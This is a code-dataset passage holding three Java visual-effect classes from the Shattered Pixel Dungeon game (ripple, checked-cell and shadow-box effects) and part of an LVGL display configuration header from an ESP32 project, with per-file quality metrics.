"qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Ripple.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
public class Ripple extends Image {
private static final float TIME_TO_FADE = 0.5f;
private float time;
public Ripple() {
super( Effects.get( Effects.Type.RIPPLE ) );
}
public void reset( int p ) {
revive();
x = (p % Dungeon.level.width()) * DungeonTilemap.SIZE;
y = (p / Dungeon.level.width()) * DungeonTilemap.SIZE;
origin.set( width / 2, height / 2 );
scale.set( 0 );
time = TIME_TO_FADE;
}
@Override
public void update() {
super.update();
if ((time -= Game.elapsed) <= 0) {
kill();
} else {
float p = time / TIME_TO_FADE;
scale.set( 1 - p );
alpha( p );
}
}
}
| 1,660 | Ripple | java | en | java | code | {"qsc_code_num_words": 230, "qsc_code_num_chars": 1660.0, "qsc_code_mean_word_length": 5.03913043, "qsc_code_frac_words_unique": 0.55217391, "qsc_code_frac_chars_top_2grams": 0.03106126, "qsc_code_frac_chars_top_3grams": 0.0336497, "qsc_code_frac_chars_top_4grams": 0.04918033, "qsc_code_frac_chars_dupe_5grams": 0.13287317, "qsc_code_frac_chars_dupe_6grams": 0.11044003, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01801802, "qsc_code_frac_chars_whitespace": 0.19759036, "qsc_code_size_file_byte": 1660.0, "qsc_code_num_lines": 62.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 26.77419355, "qsc_code_frac_chars_alphabet": 0.8521021, "qsc_code_frac_chars_comments": 0.47048193, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06451613, "qsc_codejava_score_lines_no_logic": 0.25806452, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/CheckedCell.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.gltextures.TextureCache;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
public class CheckedCell extends Image {
private float alpha;
public CheckedCell( int pos ) {
super( TextureCache.createSolid( 0xFF55AAFF ) );
origin.set( 0.5f );
point( DungeonTilemap.tileToWorld( pos ).offset(
DungeonTilemap.SIZE / 2,
DungeonTilemap.SIZE / 2 ) );
alpha = 0.8f;
}
@Override
public void update() {
if ((alpha -= Game.elapsed) > 0) {
alpha( alpha );
scale.set( DungeonTilemap.SIZE * alpha );
} else {
killAndErase();
}
}
}
| 1,506 | CheckedCell | java | en | java | code | {"qsc_code_num_words": 199, "qsc_code_num_chars": 1506.0, "qsc_code_mean_word_length": 5.47236181, "qsc_code_frac_words_unique": 0.60301508, "qsc_code_frac_chars_top_2grams": 0.03305785, "qsc_code_frac_chars_top_3grams": 0.03581267, "qsc_code_frac_chars_top_4grams": 0.0523416, "qsc_code_frac_chars_dupe_5grams": 0.07529844, "qsc_code_frac_chars_dupe_6grams": 0.05142332, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02205882, "qsc_code_frac_chars_whitespace": 0.187251, "qsc_code_size_file_byte": 1506.0, "qsc_code_num_lines": 53.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 28.41509434, "qsc_code_frac_chars_alphabet": 0.86764706, "qsc_code_frac_chars_comments": 0.5185923, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0137931, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04, "qsc_codejava_score_lines_no_logic": 0.28, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/ShadowBox.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.watabou.gltextures.SmartTexture;
import com.watabou.glwrap.Texture;
import com.watabou.noosa.NinePatch;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
public class ShadowBox extends NinePatch {
public static final float SIZE = 16;
public ShadowBox() {
super( Assets.SHADOW, 1 );
//If this is the first time the texture is generated, set the filtering
if (texture.id == -1)
texture.filter( SmartTexture.LINEAR, SmartTexture.LINEAR );
scale.set( SIZE, SIZE );
}
@Override
public void size(float width, float height) {
super.size( width / SIZE, height / SIZE );
}
public void boxRect( float x, float y, float width, float height ) {
this.x = x - SIZE;
this.y = y - SIZE;
size( width + SIZE * 2, height + SIZE * 2 );
}
}
| 1,542 | ShadowBox | java | en | java | code | {"qsc_code_num_words": 221, "qsc_code_num_chars": 1542.0, "qsc_code_mean_word_length": 5.0678733, "qsc_code_frac_words_unique": 0.52036199, "qsc_code_frac_chars_top_2grams": 0.03214286, "qsc_code_frac_chars_top_3grams": 0.03482143, "qsc_code_frac_chars_top_4grams": 0.05089286, "qsc_code_frac_chars_dupe_5grams": 0.07321429, "qsc_code_frac_chars_dupe_6grams": 0.05, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01196172, "qsc_code_frac_chars_whitespace": 0.18677043, "qsc_code_size_file_byte": 1542.0, "qsc_code_num_lines": 49.0, "qsc_code_num_chars_line_max": 74.0, "qsc_code_num_chars_line_mean": 31.46938776, "qsc_code_frac_chars_alphabet": 0.88118022, "qsc_code_frac_chars_comments": 0.50583658, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.08695652, "qsc_codejava_score_lines_no_logic": 0.30434783, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lvgl_gui/lv_conf.h | /**
* @file lv_conf.h
* Configuration file for v7.3.1
*/
/*
* COPY THIS FILE AS `lv_conf.h` NEXT TO the `lvgl` FOLDER
*/
#if 1 /*Set it to "1" to enable content*/
#ifndef LV_CONF_H
#define LV_CONF_H
/* clang-format off */
#include <stdint.h>
#include "board_def.h"
/*====================
Graphical settings
*====================*/
/* Maximal horizontal and vertical resolution to support by the library.*/
#define LV_HOR_RES_MAX (TFT_WITDH)
#define LV_VER_RES_MAX (TFT_HEIGHT)
/* Color depth:
* - 1: 1 byte per pixel
* - 8: RGB332
* - 16: RGB565
* - 32: ARGB8888
*/
#define LV_COLOR_DEPTH 16
/* Swap the 2 bytes of RGB565 color.
* Useful if the display has a 8 bit interface (e.g. SPI)*/
#define LV_COLOR_16_SWAP 0
/* 1: Enable screen transparency.
* Useful for OSD or other overlapping GUIs.
* Requires `LV_COLOR_DEPTH = 32` colors and the screen's style should be modified: `style.body.opa = ...`*/
#define LV_COLOR_SCREEN_TRANSP 0
/*Images pixels with this color will not be drawn (with chroma keying)*/
#define LV_COLOR_TRANSP LV_COLOR_LIME /*LV_COLOR_LIME: pure green*/
/* Enable anti-aliasing (lines, and radiuses will be smoothed) */
#define LV_ANTIALIAS 1
/* Default display refresh period.
* Can be changed in the display driver (`lv_disp_drv_t`).*/
#define LV_DISP_DEF_REFR_PERIOD 30 /*[ms]*/
/* Dot Per Inch: used to initialize default sizes.
* E.g. a button with width = LV_DPI / 2 -> half inch wide
* (Not so important, you can adjust it to modify default sizes and spaces)*/
#define LV_DPI 130 /*[px]*/
/* The the real width of the display changes some default values:
* default object sizes, layout of examples, etc.
* According to the width of the display (hor. res. / dpi)
* the displays fall in 4 categories.
* The 4th is extra large which has no upper limit so not listed here
* The upper limit of the categories are set below in 0.1 inch unit.
*/
#define LV_DISP_SMALL_LIMIT 30
#define LV_DISP_MEDIUM_LIMIT 50
#define LV_DISP_LARGE_LIMIT 70
/* Type of coordinates. Should be `int16_t` (or `int32_t` for extreme cases) */
typedef int16_t lv_coord_t;
/*=========================
Memory manager settings
*=========================*/
/* LittelvGL's internal memory manager's settings.
* The graphical objects and other related data are stored here. */
/* 1: use custom malloc/free, 0: use the built-in `lv_mem_alloc` and `lv_mem_free` */
#define LV_MEM_CUSTOM 0
#if LV_MEM_CUSTOM == 0
/* Size of the memory used by `lv_mem_alloc` in bytes (>= 2kB)*/
# define LV_MEM_SIZE (32U * 1024U)
/* Complier prefix for a big array declaration */
# define LV_MEM_ATTR
/* Set an address for the memory pool instead of allocating it as an array.
* Can be in external SRAM too. */
# define LV_MEM_ADR 0
/* Automatically defrag. on free. Defrag. means joining the adjacent free cells. */
# define LV_MEM_AUTO_DEFRAG 1
#else /*LV_MEM_CUSTOM*/
# define LV_MEM_CUSTOM_INCLUDE <stdlib.h> /*Header for the dynamic memory function*/
# define LV_MEM_CUSTOM_ALLOC malloc /*Wrapper to malloc*/
# define LV_MEM_CUSTOM_FREE free /*Wrapper to free*/
#endif /*LV_MEM_CUSTOM*/
/* Use the standard memcpy and memset instead of LVGL's own functions.
* The standard functions might or might not be faster depending on their implementation. */
#define LV_MEMCPY_MEMSET_STD 0
/* Garbage Collector settings
* Used if lvgl is binded to higher level language and the memory is managed by that language */
#define LV_ENABLE_GC 0
#if LV_ENABLE_GC != 0
# define LV_GC_INCLUDE "gc.h" /*Include Garbage Collector related things*/
# define LV_MEM_CUSTOM_REALLOC your_realloc /*Wrapper to realloc*/
# define LV_MEM_CUSTOM_GET_SIZE your_mem_get_size /*Wrapper to lv_mem_get_size*/
#endif /* LV_ENABLE_GC */
/*=======================
Input device settings
*=======================*/
/* Input device default settings.
* Can be changed in the Input device driver (`lv_indev_drv_t`)*/
/* Input device read period in milliseconds */
#define LV_INDEV_DEF_READ_PERIOD 30
/* Drag threshold in pixels */
#define LV_INDEV_DEF_DRAG_LIMIT 10
/* Drag throw slow-down in [%]. Greater value -> faster slow-down */
#define LV_INDEV_DEF_DRAG_THROW 10
/* Long press time in milliseconds.
* Time to send `LV_EVENT_LONG_PRESSSED`) */
#define LV_INDEV_DEF_LONG_PRESS_TIME 400
/* Repeated trigger period in long press [ms]
* Time between `LV_EVENT_LONG_PRESSED_REPEAT */
#define LV_INDEV_DEF_LONG_PRESS_REP_TIME 100
/* Gesture threshold in pixels */
#define LV_INDEV_DEF_GESTURE_LIMIT 50
/* Gesture min velocity at release before swipe (pixels)*/
#define LV_INDEV_DEF_GESTURE_MIN_VELOCITY 3
/*==================
* Feature usage
*==================*/
/*1: Enable the Animations */
#define LV_USE_ANIMATION 1
#if LV_USE_ANIMATION
/*Declare the type of the user data of animations (can be e.g. `void *`, `int`, `struct`)*/
typedef void * lv_anim_user_data_t;
#endif
/* 1: Enable shadow drawing on rectangles*/
#define LV_USE_SHADOW 1
#if LV_USE_SHADOW
/* Allow buffering some shadow calculation
* LV_SHADOW_CACHE_SIZE is the max. shadow size to buffer,
* where shadow size is `shadow_width + radius`
* Caching has LV_SHADOW_CACHE_SIZE^2 RAM cost*/
#define LV_SHADOW_CACHE_SIZE 0
#endif
/*1: enable outline drawing on rectangles*/
#define LV_USE_OUTLINE 1
/*1: enable pattern drawing on rectangles*/
#define LV_USE_PATTERN 1
/*1: enable value string drawing on rectangles*/
#define LV_USE_VALUE_STR 1
/* 1: Use other blend modes than normal (`LV_BLEND_MODE_...`)*/
#define LV_USE_BLEND_MODES 1
/* 1: Use the `opa_scale` style property to set the opacity of an object and its children at once*/
#define LV_USE_OPA_SCALE 1
/* 1: Use image zoom and rotation*/
#define LV_USE_IMG_TRANSFORM 1
/* 1: Enable object groups (for keyboard/encoder navigation) */
#define LV_USE_GROUP 1
#if LV_USE_GROUP
typedef void * lv_group_user_data_t;
#endif /*LV_USE_GROUP*/
/* 1: Enable GPU interface*/
#define LV_USE_GPU 1 /*Only enables `gpu_fill_cb` and `gpu_blend_cb` in the disp. drv- */
#define LV_USE_GPU_STM32_DMA2D 0
/*If enabling LV_USE_GPU_STM32_DMA2D, LV_GPU_DMA2D_CMSIS_INCLUDE must be defined to include path of CMSIS header of target processor
e.g. "stm32f769xx.h" or "stm32f429xx.h" */
#define LV_GPU_DMA2D_CMSIS_INCLUDE
/* 1: Enable file system (might be required for images */
#define LV_USE_FILESYSTEM 1
#if LV_USE_FILESYSTEM
/*Declare the type of the user data of file system drivers (can be e.g. `void *`, `int`, `struct`)*/
typedef void * lv_fs_drv_user_data_t;
#endif
/*1: Add a `user_data` to drivers and objects*/
#define LV_USE_USER_DATA 0
/*1: Show CPU usage and FPS count in the right bottom corner*/
#define LV_USE_PERF_MONITOR 0
/*1: Use the functions and types from the older API if possible */
#define LV_USE_API_EXTENSION_V6 1
#define LV_USE_API_EXTENSION_V7 1
/*========================
* Image decoder and cache
*========================*/
/* 1: Enable indexed (palette) images */
#define LV_IMG_CF_INDEXED 1
/* 1: Enable alpha indexed images */
#define LV_IMG_CF_ALPHA 1
/* Default image cache size. Image caching keeps the images opened.
* If only the built-in image formats are used there is no real advantage of caching.
* (I.e. no new image decoder is added)
* With complex image decoders (e.g. PNG or JPG) caching can save the continuous open/decode of images.
* However the opened images might consume additional RAM.
* LV_IMG_CACHE_DEF_SIZE must be >= 1 */
#define LV_IMG_CACHE_DEF_SIZE 1
/*Declare the type of the user data of image decoder (can be e.g. `void *`, `int`, `struct`)*/
typedef void * lv_img_decoder_user_data_t;
/*=====================
* Compiler settings
*====================*/
/* For big endian systems set to 1 */
#define LV_BIG_ENDIAN_SYSTEM 0
/* Define a custom attribute to `lv_tick_inc` function */
#define LV_ATTRIBUTE_TICK_INC
/* Define a custom attribute to `lv_task_handler` function */
#define LV_ATTRIBUTE_TASK_HANDLER
/* Define a custom attribute to `lv_disp_flush_ready` function */
#define LV_ATTRIBUTE_FLUSH_READY
/* With size optimization (-Os) the compiler might not align data to
* 4 or 8 byte boundary. This alignment will be explicitly applied where needed.
* E.g. __attribute__((aligned(4))) */
#define LV_ATTRIBUTE_MEM_ALIGN
/* Attribute to mark large constant arrays for example
* font's bitmaps */
#define LV_ATTRIBUTE_LARGE_CONST
/* Prefix performance critical functions to place them into a faster memory (e.g RAM)
* Uses 15-20 kB extra memory */
#define LV_ATTRIBUTE_FAST_MEM
/* Export integer constant to binding.
* This macro is used with constants in the form of LV_<CONST> that
* should also appear on lvgl binding API such as Micropython
*
* The default value just prevents a GCC warning.
*/
#define LV_EXPORT_CONST_INT(int_value) struct _silence_gcc_warning
/* Prefix variables that are used in GPU accelerated operations, often these need to be
* placed in RAM sections that are DMA accessible */
#define LV_ATTRIBUTE_DMA
/*===================
* HAL settings
*==================*/
/* 1: use a custom tick source.
* It removes the need to manually update the tick with `lv_tick_inc`) */
#define LV_TICK_CUSTOM 0
#if LV_TICK_CUSTOM == 1
#define LV_TICK_CUSTOM_INCLUDE "Arduino.h" /*Header for the system time function*/
#define LV_TICK_CUSTOM_SYS_TIME_EXPR (millis()) /*Expression evaluating to current system time in ms*/
#endif /*LV_TICK_CUSTOM*/
typedef void * lv_disp_drv_user_data_t; /*Type of user data in the display driver*/
typedef void * lv_indev_drv_user_data_t; /*Type of user data in the input device driver*/
/*================
* Log settings
*===============*/
/*1: Enable the log module*/
#define LV_USE_LOG 0
#if LV_USE_LOG
/* How important log should be added:
* LV_LOG_LEVEL_TRACE A lot of logs to give detailed information
* LV_LOG_LEVEL_INFO Log important events
* LV_LOG_LEVEL_WARN Log if something unwanted happened but didn't cause a problem
* LV_LOG_LEVEL_ERROR Only critical issue, when the system may fail
* LV_LOG_LEVEL_NONE Do not log anything
*/
# define LV_LOG_LEVEL LV_LOG_LEVEL_INFO
/* 1: Print the log with 'printf';
* 0: user need to register a callback with `lv_log_register_print_cb`*/
# define LV_LOG_PRINTF 1
#endif /*LV_USE_LOG*/
/*=================
* Debug settings
*================*/
/* If Debug is enabled LittelvGL validates the parameters of the functions.
* If an invalid parameter is found an error log message is printed and
* the MCU halts at the error. (`LV_USE_LOG` should be enabled)
* If you are debugging the MCU you can pause
* the debugger to see exactly where the issue is.
*
* The behavior of asserts can be overwritten by redefining them here.
* E.g. #define LV_ASSERT_MEM(p) <my_assert_code>
*/
#define LV_USE_DEBUG 1
#if LV_USE_DEBUG
/*Check if the parameter is NULL. (Quite fast) */
#define LV_USE_ASSERT_NULL 1
/*Checks is the memory is successfully allocated or no. (Quite fast)*/
#define LV_USE_ASSERT_MEM 1
/*Check the integrity of `lv_mem` after critical operations. (Slow)*/
#define LV_USE_ASSERT_MEM_INTEGRITY 0
/* Check the strings.
* Search for NULL, very long strings, invalid characters, and unnatural repetitions. (Slow)
* If disabled `LV_USE_ASSERT_NULL` will be performed instead (if it's enabled) */
#define LV_USE_ASSERT_STR 0
/* Check NULL, the object's type and existence (e.g. not deleted). (Quite slow)
* If disabled `LV_USE_ASSERT_NULL` will be performed instead (if it's enabled) */
#define LV_USE_ASSERT_OBJ 0
/*Check if the styles are properly initialized. (Fast)*/
#define LV_USE_ASSERT_STYLE 0
#endif /*LV_USE_DEBUG*/
/*==================
* FONT USAGE
*===================*/
/* The built-in fonts contains the ASCII range and some Symbols with 4 bit-per-pixel.
* The symbols are available via `LV_SYMBOL_...` defines
* More info about fonts: https://docs.lvgl.io/v7/en/html/overview/font.html
* To create a new font go to: https://lvgl.com/ttf-font-to-c-array
*/
/* Montserrat fonts with bpp = 4
* https://fonts.google.com/specimen/Montserrat */
#define LV_FONT_MONTSERRAT_12 0
#define LV_FONT_MONTSERRAT_14 1
#define LV_FONT_MONTSERRAT_16 0
#define LV_FONT_MONTSERRAT_18 0
#define LV_FONT_MONTSERRAT_20 0
#define LV_FONT_MONTSERRAT_22 0
#define LV_FONT_MONTSERRAT_24 0
#define LV_FONT_MONTSERRAT_26 0
#define LV_FONT_MONTSERRAT_28 0
#define LV_FONT_MONTSERRAT_30 0
#define LV_FONT_MONTSERRAT_32 0
#define LV_FONT_MONTSERRAT_34 0
#define LV_FONT_MONTSERRAT_36 0
#define LV_FONT_MONTSERRAT_38 0
#define LV_FONT_MONTSERRAT_40 0
#define LV_FONT_MONTSERRAT_42 0
#define LV_FONT_MONTSERRAT_44 0
#define LV_FONT_MONTSERRAT_46 0
#define LV_FONT_MONTSERRAT_48 0
/* Demonstrate special features */
#define LV_FONT_MONTSERRAT_12_SUBPX 0
#define LV_FONT_MONTSERRAT_28_COMPRESSED 0 /*bpp = 3*/
#define LV_FONT_DEJAVU_16_PERSIAN_HEBREW 0 /*Hebrew, Arabic, PErisan letters and all their forms*/
#define LV_FONT_SIMSUN_16_CJK 0 /*1000 most common CJK radicals*/
/*Pixel perfect monospace font
* http://pelulamu.net/unscii/ */
#define LV_FONT_UNSCII_8 0
/* Optionally declare your custom fonts here.
* You can use these fonts as default font too
* and they will be available globally. E.g.
* #define LV_FONT_CUSTOM_DECLARE LV_FONT_DECLARE(my_font_1) \
* LV_FONT_DECLARE(my_font_2)
*/
#define LV_FONT_CUSTOM_DECLARE
/* Enable it if you have fonts with a lot of characters.
* The limit depends on the font size, font face and bpp
* but with > 10,000 characters if you see issues probably you need to enable it.*/
#define LV_FONT_FMT_TXT_LARGE 0
/* Enables/disables support for compressed fonts. If it's disabled, compressed
* glyphs cannot be processed by the library and won't be rendered.
*/
#define LV_USE_FONT_COMPRESSED 1
/* Enable subpixel rendering */
#define LV_USE_FONT_SUBPX 1
#if LV_USE_FONT_SUBPX
/* Set the pixel order of the display.
* Important only if "subpx fonts" are used.
* With "normal" font it doesn't matter.
*/
#define LV_FONT_SUBPX_BGR 0
#endif
/*Declare the type of the user data of fonts (can be e.g. `void *`, `int`, `struct`)*/
typedef void * lv_font_user_data_t;
/*================
* THEME USAGE
*================*/
/*Always enable at least on theme*/
/* No theme, you can apply your styles as you need
* No flags. Set LV_THEME_DEFAULT_FLAG 0 */
#define LV_USE_THEME_EMPTY 1
/*Simple to the create your theme based on it
* No flags. Set LV_THEME_DEFAULT_FLAG 0 */
#define LV_USE_THEME_TEMPLATE 1
/* A fast and impressive theme.
* Flags:
* LV_THEME_MATERIAL_FLAG_LIGHT: light theme
* LV_THEME_MATERIAL_FLAG_DARK: dark theme
* LV_THEME_MATERIAL_FLAG_NO_TRANSITION: disable transitions (state change animations)
* LV_THEME_MATERIAL_FLAG_NO_FOCUS: disable indication of focused state)
* */
#define LV_USE_THEME_MATERIAL 1
/* Mono-color theme for monochrome displays.
* If LV_THEME_DEFAULT_COLOR_PRIMARY is LV_COLOR_BLACK the
* texts and borders will be black and the background will be
* white. Else the colors are inverted.
* No flags. Set LV_THEME_DEFAULT_FLAG 0 */
#define LV_USE_THEME_MONO 1
#define LV_THEME_DEFAULT_INCLUDE <stdint.h> /*Include a header for the init. function*/
#define LV_THEME_DEFAULT_INIT lv_theme_material_init
#define LV_THEME_DEFAULT_COLOR_PRIMARY lv_color_hex(0x01a2b1)
